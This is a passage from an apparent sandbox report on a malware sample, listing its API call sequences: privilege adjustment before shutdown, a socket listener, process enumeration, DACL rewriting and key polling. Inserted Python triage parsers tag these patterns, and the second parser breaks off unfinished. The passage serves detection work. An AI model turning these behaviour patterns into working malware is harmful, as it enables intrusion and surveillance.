                                                                    • Opcode Fuzzy Hash: c56d1a69fd32c64cb6628a8249976cb629c75bfc9e7fe31c3e8c1341b753ffb6
                                                                    • Instruction Fuzzy Hash: E541C774A04FC96DFF359B648C043F9BEA0AF12344F048059D9C6566C2DBB499E8C7A2
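The DACL entry (GetUserObjectSecurity through SetUserObjectSecurity), the keyboard-state entry above, and the LookupPrivilegeValueW / AdjustTokenPrivileges / ExitWindowsEx entry further down the page are raw call sequences. As an added example, not part of the Joe Sandbox report or its tooling, the Python below parses that "APIs" listing format, groups calls per function entry, tests each entry against an ordered API pattern, and decodes the virtual-key codes passed to GetAsyncKeyState / GetKeyState. SAMPLE is constructed from abridged entries on this page; the SIGNATURES and VK_NAMES tables are the example's own (the VK values are the documented Win32 constants).

```python
"""Parse Joe Sandbox 'APIs' function listings and flag call patterns.
Added example, not part of the Joe Sandbox report or its tooling: SAMPLE is
constructed from entries in this report, and SIGNATURES / VK_NAMES are this
example's own tables (the VK values are the documented Win32 constants)."""
import re
from collections import namedtuple

Call = namedtuple("Call", "name module args ref subcall")

# Line shapes in the listing: "• GetAce.ADVAPI32(?,00000000,?), ref: 0015A752",
# "• _memset.LIBCMT ref: 0015A6E5", and the indented "Part of subcall function" form.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Ordered (not necessarily adjacent) API names that characterise a behaviour.
SIGNATURES = {
    "window-station/desktop DACL rewrite": ["GetUserObjectSecurity",
        "GetSecurityDescriptorDacl", "AddAce", "SetSecurityDescriptorDacl",
        "SetUserObjectSecurity"],
    "privilege adjust before ExitWindowsEx": ["LookupPrivilegeValueW",
        "AdjustTokenPrivileges", "ExitWindowsEx"],
    "modifier-key polling": ["GetKeyboardState", "GetAsyncKeyState", "GetKeyState"],
}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}

def parse_blocks(text):
    """Split the report into one list of Call per 'APIs' section (empties dropped)."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":                       # a new function entry begins
            current = []
            blocks.append(current)
        elif stripped in ("Strings", "Memory Dump Source"):
            current = None                           # API lines are over for this entry
        elif current is not None:
            m = CALL_RE.match(line)
            if m:
                current.append(Call(m["name"], m["module"], m["args"],
                                    m["ref"].upper(), m["sub"]))
    return [b for b in blocks if b]

def matches_in_order(names, pattern):
    """True if every name in pattern occurs in names, in that order."""
    it = iter(names)
    return all(any(n == p for n in it) for p in pattern)

def polled_keys(calls):
    """Decode the virtual-key codes passed to GetAsyncKeyState / GetKeyState."""
    keys = []
    for c in calls:
        if c.name in ("GetAsyncKeyState", "GetKeyState") and c.args:
            first = c.args.split(",")[0]
            if re.fullmatch(r"[0-9A-Fa-f]+", first):
                name = VK_NAMES.get(int(first, 16), "VK_0x%02X" % int(first, 16))
                if name not in keys:
                    keys.append(name)
    return keys

def analyse(text):
    """One finding per function entry: address span of its direct calls, hits, keys."""
    findings = []
    for calls in parse_blocks(text):
        direct = [c for c in calls if c.subcall is None] or calls
        names = [c.name for c in calls]
        findings.append({"refs": (direct[0].ref, direct[-1].ref),
                         "matches": [k for k, p in SIGNATURES.items()
                                     if matches_in_order(names, p)],
                         "keys": polled_keys(calls)})
    return findings

# Constructed from three entries in this report (abridged).
SAMPLE = """\
APIs
  • Part of subcall function 0015ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015ABD7
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0015A6D0
• _memset.LIBCMT ref: 0015A6E5
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0015A76E
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0015A820
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 0015A834
Memory Dump Source
APIs
• GetKeyboardState.USER32(?), ref: 00162B5F
• GetAsyncKeyState.USER32(000000A0), ref: 00162BE0
• GetKeyState.USER32(000000A0), ref: 00162BFB
• GetAsyncKeyState.USER32(000000A1), ref: 00162C15
• GetAsyncKeyState.USER32(00000011), ref: 00162C42
• GetAsyncKeyState.USER32(00000012), ref: 00162C6C
• GetAsyncKeyState.USER32(0000005B), ref: 00162C96
Memory Dump Source
APIs
  • Part of subcall function 0015B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015B180
  • Part of subcall function 0015B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015B1AD
• ExitWindowsEx.USER32(?,00000000), ref: 00167A0F
Strings
"""

if __name__ == "__main__":
    for finding in analyse(SAMPLE):
        print(finding["refs"], finding["matches"], finding["keys"])
```

Subcall lines are kept in the sequence so that a pattern can span a helper (the privilege adjustment happens in 0015B134, the ExitWindowsEx call in the caller), but the reported address span covers only the entry's direct calls. Matching is an ordered subsequence rather than a contiguous one, so interleaved CRT calls such as _memset do not break a hit.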
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: 8690a93c16b4175adf3b994f3034246fda00093515dfada841b1d3bd3bc1e771
                                                                    • Instruction ID: 95094b7ff6e5efdfc5e9be9efdc26d13f6fe8e34334fcbef3ab5f3baf4da47f4
                                                                    • Opcode Fuzzy Hash: 8690a93c16b4175adf3b994f3034246fda00093515dfada841b1d3bd3bc1e771
                                                                    • Instruction Fuzzy Hash: 96218B31300A10AFDB11AFA5EC49B6D77A8EF59710F04801AF94E9B6A1CB34EC408B95
                                                                    APIs
                                                                      • Part of subcall function 00159ABF: CLSIDFromProgID.OLE32 ref: 00159ADC
                                                                      • Part of subcall function 00159ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00159AF7
                                                                      • Part of subcall function 00159ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00159B05
                                                                      • Part of subcall function 00159ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00159B15
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0017C235
                                                                    • _memset.LIBCMT ref: 0017C242
                                                                    • _memset.LIBCMT ref: 0017C360
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0017C38C
                                                                    • CoTaskMemFree.OLE32(?), ref: 0017C397
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 0017C3E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 1300414916-2785691316
                                                                    • Opcode ID: 564b9a67e1ed3017a7c396f8c990e51174c7506c7f348741c257e408c1dbe6cb
                                                                    • Instruction ID: 7c47bd17b78acc9aa31d671ad91dac6de701d1e988fa15e224339ba2b8b37576
                                                                    • Opcode Fuzzy Hash: 564b9a67e1ed3017a7c396f8c990e51174c7506c7f348741c257e408c1dbe6cb
                                                                    • Instruction Fuzzy Hash: 4E913C71D00228EBDB10DFA4DC91EDEBBB9EF18750F10815AF919A7291DB705A45CFA0
                                                                    APIs
                                                                      • Part of subcall function 0015B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015B180
                                                                      • Part of subcall function 0015B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015B1AD
                                                                      • Part of subcall function 0015B134: GetLastError.KERNEL32 ref: 0015B1BA
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00167A0F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-194228
                                                                    • Opcode ID: 5bc8add6fe30a0671afa7fc73d34420b0f076abcfbc2c72412ae35598348c6db
                                                                    • Instruction ID: 98757dcce9a1b2f79c33a92e15f67e8a2b293eae948a1403673322d0f1eb566e
                                                                    • Opcode Fuzzy Hash: 5bc8add6fe30a0671afa7fc73d34420b0f076abcfbc2c72412ae35598348c6db
                                                                    • Instruction Fuzzy Hash: B201F7716592216AF72C16B8EC8ABBF72589B00359F290524BD13E30C2D7A05E2081A0
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00178CA8
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178CB7
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00178CD3
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00178CE2
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178CFC
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00178D10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                    • String ID:
                                                                    • API String ID: 1279440585-0
                                                                    • Opcode ID: 3dc45d13a2552e88b2fcaf3bfddcb17ea3b3378c784ab452ae0f79ded34f3924
                                                                    • Instruction ID: 1ee5021eb46090946f70ff3a1194c8e06e6c13eea81f7978c5744f5652b67d25
                                                                    • Opcode Fuzzy Hash: 3dc45d13a2552e88b2fcaf3bfddcb17ea3b3378c784ab452ae0f79ded34f3924
                                                                    • Instruction Fuzzy Hash: 9D21E1316006109FCB14EFA8ED49B6EB7B9EF59324F148158F95BA72D2CB30AD41CB61
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00166554
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00166564
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00166583
                                                                    • __wsplitpath.LIBCMT ref: 001665A7
                                                                    • _wcscat.LIBCMT ref: 001665BA
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001665F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                    • String ID:
                                                                    • API String ID: 1605983538-0
                                                                    • Opcode ID: 815a29ba71151cf0f0580fcf9583b482ac1e4518a2e4186b0e029f1e4cc5a9f4
                                                                    • Instruction ID: e08dabfef96f090862f271b45606e41364687a5e90fe310b780046bef6454008
                                                                    • Opcode Fuzzy Hash: 815a29ba71151cf0f0580fcf9583b482ac1e4518a2e4186b0e029f1e4cc5a9f4
                                                                    • Instruction Fuzzy Hash: B521A7B1900218ABDB10ABA4DC89FEDB7BCAB09340F5000E5F506D3141DB719F85CF61
                                                                    APIs
                                                                      • Part of subcall function 0017A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0017A84E
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00179296
                                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 001792B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 4170576061-0
                                                                    • Opcode ID: 8ffc74c7cac690d7c419bc51a87b89f4b048c64622190969d8d24bf6ee35d96e
                                                                    • Instruction ID: 0fa78d5ea74c248f99b1999c60a44195481118c827634e39d5fa709337de5351
                                                                    • Opcode Fuzzy Hash: 8ffc74c7cac690d7c419bc51a87b89f4b048c64622190969d8d24bf6ee35d96e
                                                                    • Instruction Fuzzy Hash: CC41CD70600610AFDB14BB68DC82E7EB7EDEF58724F148448F95AAB3D2CB749D018B91
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0016EB8A
                                                                    • _wcscmp.LIBCMT ref: 0016EBBA
                                                                    • _wcscmp.LIBCMT ref: 0016EBCF
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0016EBE0
                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0016EC0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 2387731787-0
                                                                    • Opcode ID: 2ca279213ae6346944c59bdb2227b283ae1fa18d76143356013e88aff448b34c
                                                                    • Instruction ID: cfbaca85fb8e1118a8560197b6346527f8093418230515e4cb9d5c92596e53d4
                                                                    • Opcode Fuzzy Hash: 2ca279213ae6346944c59bdb2227b283ae1fa18d76143356013e88aff448b34c
                                                                    • Instruction Fuzzy Hash: 9E41D135604701DFCB08DF28C891AA9B3E4FF59324F10465EE95A8B3A1DB31E955CF91
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: d1c0422982a5e88e32331e72ffac7f2a85c9c7d5e2d00dd9aed681a6e54370b1
                                                                    • Instruction ID: 51bcdc2db0b48bbfbdc9e72fcd8b190a6ec3d051950ce20800dad8977d605cb4
                                                                    • Opcode Fuzzy Hash: d1c0422982a5e88e32331e72ffac7f2a85c9c7d5e2d00dd9aed681a6e54370b1
                                                                    • Instruction Fuzzy Hash: 5511BF317006106FE7217F26EC48A6FBB9DEF55760B450429F84AD7641CF30AA428BA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                    • API String ID: 0-1546025612
                                                                    • Opcode ID: a385404dd4d59fb45d3ccf8a320a2199f82bf57fa11765c1e6d9d18f9758d95b
                                                                    • Instruction ID: d911128dc71e45cad5e902ba1c91ba5c88502a4636880c56262954ab194d69ec
                                                                    • Opcode Fuzzy Hash: a385404dd4d59fb45d3ccf8a320a2199f82bf57fa11765c1e6d9d18f9758d95b
                                                                    • Instruction Fuzzy Hash: 2F92DF75E0022ACBDF28CF58D8807BDB7B1BF55314F2581AAE816AB281D7309D91CF91
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0013E014,75570AE0,0013DEF1,001BDC38,?,?), ref: 0013E02C
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0013E03E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 2574300362-192647395
                                                                    • Opcode ID: fb4c9925f231edd8b926fda010c5b62e4a63e282a25eb7ca0eeeedbef72e1daf
                                                                    • Instruction ID: 24a25fa1025a7b95329b782ed562a163222866b8a5c650d336bf1962f3dade27
                                                                    • Opcode Fuzzy Hash: fb4c9925f231edd8b926fda010c5b62e4a63e282a25eb7ca0eeeedbef72e1daf
                                                                    • Instruction Fuzzy Hash: 9CD0A730500B129FC7354F60FC0861277D4AF12300F18441AF492E2A90D7B4C8C08E50
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001613DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($|
                                                                    • API String ID: 1659193697-1631851259
                                                                    • Opcode ID: 679468a716f3f4be76ad090a7df16f645c7193f007f8153ff91bd7b79cd2782c
                                                                    • Instruction ID: 0a47bc4bac0703cb43fb1da0ab77df666c8d0f323ad78576bc0c20a674635d78
                                                                    • Opcode Fuzzy Hash: 679468a716f3f4be76ad090a7df16f645c7193f007f8153ff91bd7b79cd2782c
                                                                    • Instruction Fuzzy Hash: 84320575A00705AFC728CF69C48096AB7F0FF48320B15C56EE59ADB3A1EB70E951CB44
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 0013B22F
                                                                      • Part of subcall function 0013B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0013B5A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Proc$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 2749884682-0
                                                                    • Opcode ID: 666582b387920037ea1459222b6a18aa61ba077f5153b88e100ba1fe22b1ed51
                                                                    • Instruction ID: db332946dcfea1140d39d89a24923a655eb5bdd54d11d129e91134218872552c
                                                                    • Opcode Fuzzy Hash: 666582b387920037ea1459222b6a18aa61ba077f5153b88e100ba1fe22b1ed51
                                                                    • Instruction Fuzzy Hash: 41A1597051C005BAEF2CAF2A9CC8E7F29ACFB56740F15421DF606E6591FB29AD01D272
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001743BF,00000000), ref: 00174FA6
                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00174FD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                    • String ID:
                                                                    • API String ID: 599397726-0
                                                                    • Opcode ID: 9078273d1b61dc097e6e45006d4e59ba1ab377f3bf99866d1f41e103ad079a10
                                                                    • Instruction ID: 42fd02b197c678540e35bcb8c857fd191ca9ed45a24819d030f76f9680e6418c
                                                                    • Opcode Fuzzy Hash: 9078273d1b61dc097e6e45006d4e59ba1ab377f3bf99866d1f41e103ad079a10
                                                                    • Instruction Fuzzy Hash: FF41EA71504609FFEB14DE94DC85EBF77BDEB40768F10802EF609A6141DBB19E4196A0
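The function blocks above list raw API call sequences; what a triager wants from them is the behaviour each sequence implies: SeShutdownPrivilege being enabled through AdjustTokenPrivileges before ExitWindowsEx, a socket/bind/listen listener, a UDP socket, Toolhelp32 process enumeration, and an export resolved at run time through LoadLibraryA/GetProcAddress. The Python below is an added example, not part of the Joe Sandbox report and not Joe Security's code. It parses blocks in the text layout used on this page and tags each one; SAMPLE is constructed from function blocks of this report, trimmed to the fields the parser reads, and the tag wording and the socket constant tables are the example's own. A tag only says the sequence is present in the dumped image, not that the sample executed it; correlate with the report's dynamic behaviour sections before drawing conclusions.

```python
"""Tag Joe Sandbox function blocks by the behaviour their API sequence implies.
Added example (not Joe Sandbox / Joe Security code). SAMPLE is constructed
from function blocks in this report, trimmed to the fields parsed here."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE = """\
APIs
  • Part of subcall function 0015B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015B180
  • Part of subcall function 0015B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015B1AD
  • Part of subcall function 0015B134: GetLastError.KERNEL32 ref: 0015B1BA
• ExitWindowsEx.USER32(?,00000000), ref: 00167A0F
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00178CA8
• bind.WSOCK32(00000000,?,00000010), ref: 00178CD3
• listen.WSOCK32(00000000,00000005), ref: 00178CE2
• String ID:
APIs
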